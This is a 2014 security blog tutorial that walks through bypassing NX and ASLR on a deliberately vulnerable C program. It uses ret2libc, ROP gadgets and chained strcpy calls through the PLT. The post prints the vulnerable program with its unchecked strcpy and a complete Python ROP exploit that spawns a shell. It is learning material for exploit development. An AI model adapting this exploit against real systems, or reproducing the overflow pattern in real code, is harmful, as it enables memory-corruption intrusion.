SpiderLabs Blog

Baby's first NX+ASLR bypass

Written by Dan Crowley | May 20, 2014 2:37:00 PM

Recently, I've been trying to improve my skills with regards to exploiting memory corruption flaws. While I've done some work in the past with exploiting basic buffer overflows, format string issues, etc., I'd only done the most basic work in bypassing non-executable stack and ASLR.

I decided that I wanted to learn how to exploit a basic stack-based overflow when both NX and ASLR are in use. Below I explain my process and what I learned.

First, I wrote a basic binary to exploit:

#include <string.h>

#include <unistd.h>

int main (int argc, char **argv){

char buf [1024];

if(argc == 2){

strcpy(buf, argv[1]);

}else{

system("/usr/bin/false");

}

}

This is your basic stack-based buffer overflow. Without mitigation techniques, the classic attack unfolds something like this:

  1. Put some machine code in memory to do something that we want it to do (aka "shellcode")
  2. Figure out what its position in memory will be
  3. Overwrite the stored return address on the stack to redirect program execution to our shellcode once we reach a "ret" instruction

With NX, we can't execute shellcode stored in any of the usual places, such as in the buffer we're overflowing or in an environment variable.

To get around NX, we can use a technique called "return into libc" aka "ret2libc", which allows us to use libc functions to perform the tasks we would normally perform with our shellcode. The simplest way to get a shell with ret2libc to put the string "/bin/sh" in memory somewhere, and then redirect program flow to the "system()" libc function, with the memory address of our "/bin/sh" string somewhere in memory we control, such as in an environment variable.

ASLR, however, prevents us from being able to know in advance where system() or our "/bin/sh" string will be, preventing us from using this method.

However, ASLR doesn't randomize everything; Certain things are loaded into consistent memory addresses. We can reuse chunks of code from the original program to build the payload that we want. The technique is referred to as "return oriented programming," aka "ROP," as we select chunks of code followed by "ret" instructions and chain return addresses on the stack so that as soon as the program finishes executing chunks of borrowed code, it "returns" into the next chunk of borrowed code. Given enough ROP "gadgets", or chunks of code usable with the ROP technique, we can achieve Turing completeness. However, given the small size and complexity of our binary, we don't have much to work with...

 

One very nice thing, however, is that we have the procedure linkage table. Given my relative inexperience in dealing with program internals, I'm still unclear on exactly why it exists. My best understanding is that it allows the program to locate library function addresses at runtime. Notably, the PLT's location is not randomized. We can easily call any libc function used by the binary in ret2libc style, but by returning into the PLT instead of directly into libc. Through the PLT we have system() available to us.

 

So now, we return into system@PLT, but we still have a problem: How do we know where our "/bin/sh" string will be?

Since we don't have an instance of "/bin/sh" in the binary, we can simply look for bytes in the binary to construct it. We can chain calls to strcpy to pull bytes out of the binary to create our string. For simplicity, I'll be writing just "sh;" to deal with the trailing junk that comes with copying strings from binary data. ROPgadget.py has a tool to search for usable bytes in the binary as seen here:

 

We also need a reliable writable address. The bss section will do for this, so we pull it out using objdump.

 

For each strcpy call, we need to write the memory address of strcpy@plt, followed by the memory address of a pop-pop-ret ROP gadget, followed by the address of bss offset to where in the string we want to write, followed by the memory address of the string we're copying. Each strcpy call pulls ESP+4 and ESP+8 off the stack as dest and src arguments, so we have those in place. When strcpy returns, it'll pop a value off the stack for the return address, so we point it to a pop-pop-ret gadget which will advance us in the stack such that the ret instruction will hit the next strcpy.

So, our payload will look something like:

junk_to_offset +

*strcpy@plt + *pop-pop-ret + *bss + *"s<junk>" +

*strcpy@plt + *pop-pop-ret + *(bss+1) + *"h<junk>" +

*strcpy@plt + *pop-pop-ret + *(bss+2) + *";<junk>" +

*system@plt + AAAA + *bss

This will copy "sh;" byte by byte to bss, then call system@plt, pointed at our constructed "sh;" string.

Here's our exploit:

#!/usr/bin/python

from struct import pack
from os import system

junk = 'A'*1036 #junk to offset to stored ret
strcpy = pack("<L", 0x08048320)
ppr = pack("<L", 0x080484f7) #pop pop ret

p = junk
p += strcpy
p += ppr
p += pack("<L", 0x080496cc) #bss
p += pack("<L", 0x08048142) # 's'
p += strcpy
p += ppr
p += pack("<L", 0x080496cd) #bss+1
p += pack("<L", 0x08048326) # 'h'
p += strcpy
p += ppr
p += pack("<L", 0x080496ce) #bss+2
p += pack("<L", 0x0804852f) # ';'
p += pack("<L", 0x08048330) #system
p += "AAAA"
p += pack("<L", 0x080496cc) #bss (now contains "sh;<junk>")

system("/tmp/vuln_dep2 \""+p+"\"")

Aaaaaaand...

 

...shell.